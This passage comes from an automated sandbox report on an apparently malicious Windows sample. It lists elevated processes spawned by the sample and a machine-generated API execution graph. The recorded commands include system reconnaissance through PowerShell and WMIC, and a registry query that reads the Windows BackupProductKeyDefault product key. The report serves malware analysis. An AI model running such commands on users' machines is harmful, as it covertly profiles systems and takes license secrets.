                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:99
                                                                                                                                                                                                                                        Start time:16:12:30
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:100
                                                                                                                                                                                                                                        Start time:16:12:30
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:101
                                                                                                                                                                                                                                        Start time:16:12:32
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:102
                                                                                                                                                                                                                                        Start time:16:12:32
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:103
                                                                                                                                                                                                                                        Start time:16:12:32
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:104
                                                                                                                                                                                                                                        Start time:16:12:32
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:105
                                                                                                                                                                                                                                        Start time:16:12:32
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:106
                                                                                                                                                                                                                                        Start time:16:12:33
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:8.5%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:14.2%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:24
                                                                                                                                                                                                                                          execution_graph 18841 7ff710f55698 18842 7ff710f556cf 18841->18842 18843 7ff710f556b2 18841->18843 18842->18843 18844 7ff710f556e2 CreateFileW 18842->18844 18845 7ff710f54f58 _fread_nolock 11 API calls 18843->18845 18846 7ff710f5574c 18844->18846 18847 7ff710f55716 18844->18847 18848 7ff710f556b7 18845->18848 18892 7ff710f55c74 18846->18892 18866 7ff710f557ec GetFileType 18847->18866 18851 7ff710f54f78 _set_fmode 11 API calls 18848->18851 18854 7ff710f556bf 18851->18854 18859 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 18854->18859 18855 7ff710f5572b CloseHandle 18861 7ff710f556ca 18855->18861 18856 7ff710f55741 CloseHandle 18856->18861 18857 7ff710f55755 18862 7ff710f54eec _fread_nolock 11 API calls 18857->18862 18858 7ff710f55780 18913 7ff710f55a34 18858->18913 18859->18861 18865 7ff710f5575f 18862->18865 18865->18861 18867 7ff710f558f7 18866->18867 18868 7ff710f5583a 18866->18868 18869 7ff710f558ff 18867->18869 18870 7ff710f55921 18867->18870 18871 7ff710f55866 GetFileInformationByHandle 18868->18871 18876 7ff710f55b70 21 API calls 18868->18876 18872 7ff710f55903 18869->18872 18873 7ff710f55912 GetLastError 18869->18873 18875 7ff710f55944 PeekNamedPipe 18870->18875 18891 7ff710f558e2 18870->18891 18871->18873 18874 7ff710f5588f 18871->18874 18877 7ff710f54f78 _set_fmode 11 API calls 18872->18877 18879 7ff710f54eec _fread_nolock 11 API calls 18873->18879 18878 7ff710f55a34 51 API calls 18874->18878 18875->18891 18880 7ff710f55854 18876->18880 18877->18891 18881 7ff710f5589a 18878->18881 18879->18891 18880->18871 18880->18891 18930 7ff710f55994 18881->18930 18882 7ff710f4c5c0 _log10_special 8 API calls 18884 7ff710f55724 18882->18884 18884->18855 18884->18856 18886 7ff710f55994 10 API calls 18887 7ff710f558b9 18886->18887 18888 7ff710f55994 10 API calls 18887->18888 18889 7ff710f558ca 18888->18889 18890 7ff710f54f78 _set_fmode 11 API calls 18889->18890 18889->18891 18890->18891 18891->18882 18893 7ff710f55caa 18892->18893 18894 7ff710f55d42 __std_exception_destroy 18893->18894 18895 7ff710f54f78 _set_fmode 11 API calls 18893->18895 18896 7ff710f4c5c0 _log10_special 8 API calls 18894->18896 18897 7ff710f55cbc 18895->18897 18898 7ff710f55751 18896->18898 18899 7ff710f54f78 _set_fmode 11 API calls 18897->18899 18898->18857 18898->18858 18900 7ff710f55cc4 18899->18900 18901 7ff710f57e78 45 API calls 18900->18901 18902 7ff710f55cd9 18901->18902 18903 7ff710f55ceb 18902->18903 18904 7ff710f55ce1 18902->18904 18906 7ff710f54f78 _set_fmode 11 API calls 18903->18906 18905 7ff710f54f78 _set_fmode 11 API calls 18904->18905 18912 7ff710f55ce6 18905->18912 18907 7ff710f55cf0 18906->18907 18907->18894 18908 7ff710f54f78 _set_fmode 11 API calls 18907->18908 18909 7ff710f55cfa 18908->18909 18911 7ff710f57e78 45 API calls 18909->18911 18910 7ff710f55d34 GetDriveTypeW 18910->18894 18911->18912 18912->18894 18912->18910 18915 7ff710f55a5c 18913->18915 18914 7ff710f5578d 18923 7ff710f55b70 18914->18923 18915->18914 18937 7ff710f5f794 18915->18937 18917 7ff710f55af0 18917->18914 18918 7ff710f5f794 51 API calls 18917->18918 18919 7ff710f55b03 18918->18919 18919->18914 18920 7ff710f5f794 51 API calls 18919->18920 18921 7ff710f55b16 18920->18921 18921->18914 18922 7ff710f5f794 51 API calls 18921->18922 18922->18914 18924 7ff710f55b8a 18923->18924 18925 7ff710f55bc1 18924->18925 18926 7ff710f55b9a 18924->18926 18927 7ff710f5f628 21 API calls 18925->18927 18928 7ff710f54eec _fread_nolock 11 API calls 18926->18928 18929 7ff710f55baa 18926->18929 18927->18929 18928->18929 18929->18865 18931 7ff710f559bd FileTimeToSystemTime 18930->18931 18932 7ff710f559b0 18930->18932 18933 7ff710f559d1 SystemTimeToTzSpecificLocalTime 18931->18933 18934 7ff710f559b8 18931->18934 18932->18931 18932->18934 18933->18934 18935 7ff710f4c5c0 _log10_special 8 API calls 18934->18935 18936 7ff710f558a9 18935->18936 18936->18886 18938 7ff710f5f7c5 18937->18938 18939 7ff710f5f7a1 18937->18939 18942 7ff710f5f7ff 18938->18942 18943 7ff710f5f81e 18938->18943 18939->18938 18940 7ff710f5f7a6 18939->18940 18941 7ff710f54f78 _set_fmode 11 API calls 18940->18941 18944 7ff710f5f7ab 18941->18944 18945 7ff710f54f78 _set_fmode 11 API calls 18942->18945 18946 7ff710f54fbc 45 API calls 18943->18946 18947 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 18944->18947 18948 7ff710f5f804 18945->18948 18952 7ff710f5f82b 18946->18952 18949 7ff710f5f7b6 18947->18949 18950 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 18948->18950 18949->18917 18951 7ff710f5f80f 18950->18951 18951->18917 18952->18951 18953 7ff710f6054c 51 API calls 18952->18953 18953->18952 19914 7ff710f61720 19925 7ff710f67454 19914->19925 19926 7ff710f67461 19925->19926 19927 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19926->19927 19928 7ff710f6747d 19926->19928 19927->19926 19929 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19928->19929 19930 7ff710f61729 19928->19930 19929->19928 19931 7ff710f60348 EnterCriticalSection 19930->19931 16037 7ff710f4ccac 16058 7ff710f4ce7c 16037->16058 16040 7ff710f4cdf8 16212 7ff710f4d19c IsProcessorFeaturePresent 16040->16212 16041 7ff710f4ccc8 __scrt_acquire_startup_lock 16043 7ff710f4ce02 16041->16043 16047 7ff710f4cce6 __scrt_release_startup_lock 16041->16047 16044 7ff710f4d19c 7 API calls 16043->16044 16046 7ff710f4ce0d _CreateFrameInfo 16044->16046 16045 7ff710f4cd0b 16047->16045 16048 7ff710f4cd91 16047->16048 16201 7ff710f59b9c 16047->16201 16064 7ff710f4d2e4 16048->16064 16050 7ff710f4cd96 16067 7ff710f41000 16050->16067 16055 7ff710f4cdb9 16055->16046 16208 7ff710f4d000 16055->16208 16059 7ff710f4ce84 16058->16059 16060 7ff710f4ce90 __scrt_dllmain_crt_thread_attach 16059->16060 16061 7ff710f4ccc0 16060->16061 16062 7ff710f4ce9d 16060->16062 16061->16040 16061->16041 16062->16061 16219 7ff710f4d8f8 16062->16219 16246 7ff710f6a540 16064->16246 16066 7ff710f4d2fb GetStartupInfoW 16066->16050 16068 7ff710f41009 16067->16068 16248 7ff710f554f4 16068->16248 16070 7ff710f437fb 16255 7ff710f436b0 16070->16255 16076 7ff710f4383c 16415 7ff710f41c80 16076->16415 16077 7ff710f4391b 16424 7ff710f445b0 16077->16424 16081 7ff710f4385b 16327 7ff710f48a20 16081->16327 16083 7ff710f4396a 16447 7ff710f42710 16083->16447 16087 7ff710f4388e 16094 7ff710f438bb __std_exception_destroy 16087->16094 16419 7ff710f48b90 16087->16419 16088 7ff710f4395d 16089 7ff710f43962 16088->16089 16090 7ff710f43984 16088->16090 16443 7ff710f500bc 16089->16443 16092 7ff710f41c80 49 API calls 16090->16092 16095 7ff710f439a3 16092->16095 16096 7ff710f48a20 14 API calls 16094->16096 16103 7ff710f438de __std_exception_destroy 16094->16103 16100 7ff710f41950 115 API calls 16095->16100 16096->16103 16098 7ff710f43a0b 16099 7ff710f48b90 40 API calls 16098->16099 16101 7ff710f43a17 16099->16101 16102 7ff710f439ce 16100->16102 16104 7ff710f48b90 40 API calls 16101->16104 16102->16081 16105 7ff710f439de 16102->16105 16109 7ff710f4390e __std_exception_destroy 16103->16109 16458 7ff710f48b30 16103->16458 16107 7ff710f43a23 16104->16107 16106 7ff710f42710 54 API calls 16105->16106 16115 7ff710f43808 __std_exception_destroy 16106->16115 16108 7ff710f48b90 40 API calls 16107->16108 16108->16109 16110 7ff710f48a20 14 API calls 16109->16110 16111 7ff710f43a3b 16110->16111 16112 7ff710f43b2f 16111->16112 16113 7ff710f43a60 __std_exception_destroy 16111->16113 16114 7ff710f42710 54 API calls 16112->16114 16116 7ff710f48b30 40 API calls 16113->16116 16124 7ff710f43aab 16113->16124 16114->16115 16465 7ff710f4c5c0 16115->16465 16116->16124 16117 7ff710f48a20 14 API calls 16118 7ff710f43bf4 __std_exception_destroy 16117->16118 16119 7ff710f43d41 16118->16119 16120 7ff710f43c46 16118->16120 16474 7ff710f444d0 16119->16474 16121 7ff710f43c50 16120->16121 16122 7ff710f43cd4 16120->16122 16340 7ff710f490e0 16121->16340 16126 7ff710f48a20 14 API calls 16122->16126 16124->16117 16129 7ff710f43ce0 16126->16129 16127 7ff710f43d4f 16130 7ff710f43d71 16127->16130 16131 7ff710f43d65 16127->16131 16132 7ff710f43c61 16129->16132 16136 7ff710f43ced 16129->16136 16134 7ff710f41c80 49 API calls 16130->16134 16477 7ff710f44620 16131->16477 16138 7ff710f42710 54 API calls 16132->16138 16145 7ff710f43cc8 __std_exception_destroy 16134->16145 16139 7ff710f41c80 49 API calls 16136->16139 16138->16115 16142 7ff710f43d0b 16139->16142 16140 7ff710f43dc4 16390 7ff710f49400 16140->16390 16142->16145 16146 7ff710f43d12 16142->16146 16143 7ff710f43da7 SetDllDirectoryW LoadLibraryExW 16143->16140 16144 7ff710f43dd7 SetDllDirectoryW 16149 7ff710f43e0a 16144->16149 16192 7ff710f43e5a 16144->16192 16145->16140 16145->16143 16148 7ff710f42710 54 API calls 16146->16148 16148->16115 16151 7ff710f48a20 14 API calls 16149->16151 16150 7ff710f43ffc 16153 7ff710f44029 16150->16153 16154 7ff710f44006 PostMessageW GetMessageW 16150->16154 16158 7ff710f43e16 __std_exception_destroy 16151->16158 16152 7ff710f43f1b 16395 7ff710f433c0 16152->16395 16554 7ff710f43360 16153->16554 16154->16153 16159 7ff710f43ef2 16158->16159 16163 7ff710f43e4e 16158->16163 16162 7ff710f48b30 40 API calls 16159->16162 16162->16192 16163->16192 16480 7ff710f46db0 16163->16480 16170 7ff710f46fb0 FreeLibrary 16173 7ff710f4404f 16170->16173 16178 7ff710f43e81 16181 7ff710f43ea2 16178->16181 16193 7ff710f43e85 16178->16193 16501 7ff710f46df0 16178->16501 16181->16193 16520 7ff710f471a0 16181->16520 16192->16150 16192->16152 16193->16192 16536 7ff710f42a50 16193->16536 16202 7ff710f59bd4 16201->16202 16203 7ff710f59bb3 16201->16203 18792 7ff710f5a448 16202->18792 16203->16048 16206 7ff710f4d328 GetModuleHandleW 16207 7ff710f4d339 16206->16207 16207->16055 16209 7ff710f4d011 16208->16209 16210 7ff710f4cdd0 16209->16210 16211 7ff710f4d8f8 7 API calls 16209->16211 16210->16045 16211->16210 16213 7ff710f4d1c2 _isindst __scrt_get_show_window_mode 16212->16213 16214 7ff710f4d1e1 RtlCaptureContext RtlLookupFunctionEntry 16213->16214 16215 7ff710f4d20a RtlVirtualUnwind 16214->16215 16216 7ff710f4d246 __scrt_get_show_window_mode 16214->16216 16215->16216 16217 7ff710f4d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16216->16217 16218 7ff710f4d2c6 _isindst 16217->16218 16218->16043 16220 7ff710f4d90a 16219->16220 16221 7ff710f4d900 16219->16221 16220->16061 16225 7ff710f4dc94 16221->16225 16226 7ff710f4dca3 16225->16226 16227 7ff710f4d905 16225->16227 16233 7ff710f4ded0 16226->16233 16229 7ff710f4dd00 16227->16229 16230 7ff710f4dd2b 16229->16230 16231 7ff710f4dd0e DeleteCriticalSection 16230->16231 16232 7ff710f4dd2f 16230->16232 16231->16230 16232->16220 16237 7ff710f4dd38 16233->16237 16238 7ff710f4de22 TlsFree 16237->16238 16240 7ff710f4dd7c __vcrt_FlsAlloc 16237->16240 16239 7ff710f4ddaa LoadLibraryExW 16242 7ff710f4ddcb GetLastError 16239->16242 16243 7ff710f4de49 16239->16243 16240->16238 16240->16239 16241 7ff710f4de69 GetProcAddress 16240->16241 16245 7ff710f4dded LoadLibraryExW 16240->16245 16241->16238 16242->16240 16243->16241 16244 7ff710f4de60 FreeLibrary 16243->16244 16244->16241 16245->16240 16245->16243 16247 7ff710f6a530 16246->16247 16247->16066 16247->16247 16251 7ff710f5f4f0 16248->16251 16249 7ff710f5f543 16567 7ff710f5a884 16249->16567 16251->16249 16252 7ff710f5f596 16251->16252 16577 7ff710f5f3c8 16252->16577 16254 7ff710f5f56c 16254->16070 16684 7ff710f4c8c0 16255->16684 16258 7ff710f436eb GetLastError 16691 7ff710f42c50 16258->16691 16259 7ff710f43710 16686 7ff710f492f0 FindFirstFileExW 16259->16686 16262 7ff710f43706 16267 7ff710f4c5c0 _log10_special 8 API calls 16262->16267 16264 7ff710f4377d 16717 7ff710f494b0 16264->16717 16265 7ff710f43723 16706 7ff710f49370 CreateFileW 16265->16706 16270 7ff710f437b5 16267->16270 16270->16115 16277 7ff710f41950 16270->16277 16271 7ff710f4378b 16271->16262 16275 7ff710f42810 49 API calls 16271->16275 16272 7ff710f4374c __vcrt_FlsAlloc 16272->16264 16273 7ff710f43734 16709 7ff710f42810 16273->16709 16275->16262 16278 7ff710f445b0 108 API calls 16277->16278 16279 7ff710f41985 16278->16279 16280 7ff710f41c43 16279->16280 16282 7ff710f47f80 83 API calls 16279->16282 16281 7ff710f4c5c0 _log10_special 8 API calls 16280->16281 16283 7ff710f41c5e 16281->16283 16284 7ff710f419cb 16282->16284 16283->16076 16283->16077 16326 7ff710f41a03 16284->16326 17122 7ff710f50744 16284->17122 16286 7ff710f500bc 74 API calls 16286->16280 16287 7ff710f419e5 16288 7ff710f419e9 16287->16288 16289 7ff710f41a08 16287->16289 16290 7ff710f54f78 _set_fmode 11 API calls 16288->16290 17126 7ff710f5040c 16289->17126 16292 7ff710f419ee 16290->16292 17129 7ff710f42910 16292->17129 16295 7ff710f41a26 16297 7ff710f54f78 _set_fmode 11 API calls 16295->16297 16296 7ff710f41a45 16299 7ff710f41a5c 16296->16299 16300 7ff710f41a7b 16296->16300 16298 7ff710f41a2b 16297->16298 16301 7ff710f42910 54 API calls 16298->16301 16302 7ff710f54f78 _set_fmode 11 API calls 16299->16302 16303 7ff710f41c80 49 API calls 16300->16303 16301->16326 16304 7ff710f41a61 16302->16304 16305 7ff710f41a92 16303->16305 16306 7ff710f42910 54 API calls 16304->16306 16307 7ff710f41c80 49 API calls 16305->16307 16306->16326 16308 7ff710f41add 16307->16308 16309 7ff710f50744 73 API calls 16308->16309 16310 7ff710f41b01 16309->16310 16311 7ff710f41b16 16310->16311 16312 7ff710f41b35 16310->16312 16313 7ff710f54f78 _set_fmode 11 API calls 16311->16313 16314 7ff710f5040c _fread_nolock 53 API calls 16312->16314 16315 7ff710f41b1b 16313->16315 16316 7ff710f41b4a 16314->16316 16317 7ff710f42910 54 API calls 16315->16317 16318 7ff710f41b50 16316->16318 16319 7ff710f41b6f 16316->16319 16317->16326 16320 7ff710f54f78 _set_fmode 11 API calls 16318->16320 17144 7ff710f50180 16319->17144 16323 7ff710f41b55 16320->16323 16324 7ff710f42910 54 API calls 16323->16324 16324->16326 16325 7ff710f42710 54 API calls 16325->16326 16326->16286 16328 7ff710f48a2a 16327->16328 16329 7ff710f49400 2 API calls 16328->16329 16330 7ff710f48a49 GetEnvironmentVariableW 16329->16330 16331 7ff710f48a66 ExpandEnvironmentStringsW 16330->16331 16332 7ff710f48ab2 16330->16332 16331->16332 16333 7ff710f48a88 16331->16333 16334 7ff710f4c5c0 _log10_special 8 API calls 16332->16334 16335 7ff710f494b0 2 API calls 16333->16335 16336 7ff710f48ac4 16334->16336 16337 7ff710f48a9a 16335->16337 16336->16087 16338 7ff710f4c5c0 _log10_special 8 API calls 16337->16338 16339 7ff710f48aaa 16338->16339 16339->16087 16341 7ff710f490f5 16340->16341 17362 7ff710f48760 GetCurrentProcess OpenProcessToken 16341->17362 16344 7ff710f48760 7 API calls 16345 7ff710f49121 16344->16345 16346 7ff710f4913a 16345->16346 16347 7ff710f49154 16345->16347 16348 7ff710f426b0 48 API calls 16346->16348 16349 7ff710f426b0 48 API calls 16347->16349 16350 7ff710f49152 16348->16350 16351 7ff710f49167 LocalFree LocalFree 16349->16351 16350->16351 16352 7ff710f49183 16351->16352 16354 7ff710f4918f 16351->16354 17372 7ff710f42b50 16352->17372 16355 7ff710f4c5c0 _log10_special 8 API calls 16354->16355 16356 7ff710f43c55 16355->16356 16356->16132 16357 7ff710f48850 16356->16357 16358 7ff710f48868 16357->16358 16359 7ff710f4888c 16358->16359 16360 7ff710f488ea GetTempPathW GetCurrentProcessId 16358->16360 16362 7ff710f48a20 14 API calls 16359->16362 17381 7ff710f425c0 16360->17381 16363 7ff710f48898 16362->16363 17388 7ff710f481c0 16363->17388 16368 7ff710f488d8 __std_exception_destroy 16375 7ff710f489c4 __std_exception_destroy 16368->16375 16370 7ff710f48918 __std_exception_destroy 16376 7ff710f48955 __std_exception_destroy 16370->16376 17385 7ff710f58bd8 16370->17385 16372 7ff710f488be __std_exception_destroy 16372->16360 16379 7ff710f488cc 16372->16379 16377 7ff710f4c5c0 _log10_special 8 API calls 16375->16377 16376->16375 16382 7ff710f49400 2 API calls 16376->16382 16378 7ff710f43cbb 16377->16378 16378->16132 16378->16145 16381 7ff710f42810 49 API calls 16379->16381 16381->16368 16383 7ff710f489a1 16382->16383 16384 7ff710f489d9 16383->16384 16385 7ff710f489a6 16383->16385 16387 7ff710f582a8 38 API calls 16384->16387 16386 7ff710f49400 2 API calls 16385->16386 16388 7ff710f489b6 16386->16388 16387->16375 16389 7ff710f582a8 38 API calls 16388->16389 16389->16375 16391 7ff710f49422 MultiByteToWideChar 16390->16391 16393 7ff710f49446 16390->16393 16392 7ff710f4945c __std_exception_destroy 16391->16392 16391->16393 16392->16144 16393->16392 16394 7ff710f49463 MultiByteToWideChar 16393->16394 16394->16392 16407 7ff710f433ce __scrt_get_show_window_mode 16395->16407 16396 7ff710f4c5c0 _log10_special 8 API calls 16397 7ff710f43664 16396->16397 16397->16115 16414 7ff710f490c0 LocalFree 16397->16414 16399 7ff710f435c7 16399->16396 16400 7ff710f41c80 49 API calls 16400->16407 16401 7ff710f435e2 16403 7ff710f42710 54 API calls 16401->16403 16403->16399 16406 7ff710f435c9 16408 7ff710f42710 54 API calls 16406->16408 16407->16399 16407->16400 16407->16401 16407->16406 16409 7ff710f42a50 54 API calls 16407->16409 16412 7ff710f435d0 16407->16412 17677 7ff710f44550 16407->17677 17683 7ff710f47e10 16407->17683 17695 7ff710f41600 16407->17695 17743 7ff710f47110 16407->17743 17747 7ff710f44180 16407->17747 17791 7ff710f44440 16407->17791 16408->16399 16409->16407 16413 7ff710f42710 54 API calls 16412->16413 16413->16399 16416 7ff710f41ca5 16415->16416 16417 7ff710f549f4 49 API calls 16416->16417 16418 7ff710f41cc8 16417->16418 16418->16081 16420 7ff710f49400 2 API calls 16419->16420 16421 7ff710f48ba4 16420->16421 16422 7ff710f582a8 38 API calls 16421->16422 16423 7ff710f48bb6 __std_exception_destroy 16422->16423 16423->16094 16425 7ff710f445bc 16424->16425 16426 7ff710f49400 2 API calls 16425->16426 16427 7ff710f445e4 16426->16427 16428 7ff710f49400 2 API calls 16427->16428 16429 7ff710f445f7 16428->16429 17974 7ff710f56004 16429->17974 16432 7ff710f4c5c0 _log10_special 8 API calls 16433 7ff710f4392b 16432->16433 16433->16083 16434 7ff710f47f80 16433->16434 16435 7ff710f47fa4 16434->16435 16436 7ff710f50744 73 API calls 16435->16436 16437 7ff710f4807b __std_exception_destroy 16435->16437 16438 7ff710f47fc0 16436->16438 16437->16088 16438->16437 18366 7ff710f57938 16438->18366 16440 7ff710f50744 73 API calls 16442 7ff710f47fd5 16440->16442 16441 7ff710f5040c _fread_nolock 53 API calls 16441->16442 16442->16437 16442->16440 16442->16441 16444 7ff710f500ec 16443->16444 18381 7ff710f4fe98 16444->18381 16446 7ff710f50105 16446->16083 16448 7ff710f4c8c0 16447->16448 16449 7ff710f42734 GetCurrentProcessId 16448->16449 16450 7ff710f41c80 49 API calls 16449->16450 16451 7ff710f42787 16450->16451 16452 7ff710f549f4 49 API calls 16451->16452 16453 7ff710f427cf 16452->16453 16454 7ff710f42620 12 API calls 16453->16454 16455 7ff710f427f1 16454->16455 16456 7ff710f4c5c0 _log10_special 8 API calls 16455->16456 16457 7ff710f42801 16456->16457 16457->16115 16459 7ff710f49400 2 API calls 16458->16459 16460 7ff710f48b4c 16459->16460 16461 7ff710f49400 2 API calls 16460->16461 16462 7ff710f48b5c 16461->16462 16463 7ff710f582a8 38 API calls 16462->16463 16464 7ff710f48b6a __std_exception_destroy 16463->16464 16464->16098 16466 7ff710f4c5c9 16465->16466 16467 7ff710f43ca7 16466->16467 16468 7ff710f4c950 IsProcessorFeaturePresent 16466->16468 16467->16206 16469 7ff710f4c968 16468->16469 18392 7ff710f4cb48 RtlCaptureContext 16469->18392 16475 7ff710f41c80 49 API calls 16474->16475 16476 7ff710f444ed 16475->16476 16476->16127 16478 7ff710f41c80 49 API calls 16477->16478 16479 7ff710f44650 16478->16479 16479->16145 16479->16479 16481 7ff710f46dc5 16480->16481 16482 7ff710f43e6c 16481->16482 16483 7ff710f54f78 _set_fmode 11 API calls 16481->16483 16486 7ff710f47330 16482->16486 16484 7ff710f46dd2 16483->16484 16485 7ff710f42910 54 API calls 16484->16485 16485->16482 18397 7ff710f41470 16486->18397 16488 7ff710f47358 16489 7ff710f44620 49 API calls 16488->16489 16495 7ff710f474a9 __std_exception_destroy 16488->16495 16490 7ff710f4737a 16489->16490 16491 7ff710f44620 49 API calls 16490->16491 16494 7ff710f4737f 16490->16494 16493 7ff710f4739e 16491->16493 16492 7ff710f42a50 54 API calls 16492->16495 16493->16494 16496 7ff710f44620 49 API calls 16493->16496 16494->16492 16495->16178 16497 7ff710f473ba 16496->16497 16497->16494 16498 7ff710f473c3 16497->16498 16499 7ff710f42710 54 API calls 16498->16499 16500 7ff710f47433 __std_exception_destroy memcpy_s 16498->16500 16499->16495 16500->16178 16517 7ff710f46e0c 16501->16517 16502 7ff710f46f2f 16503 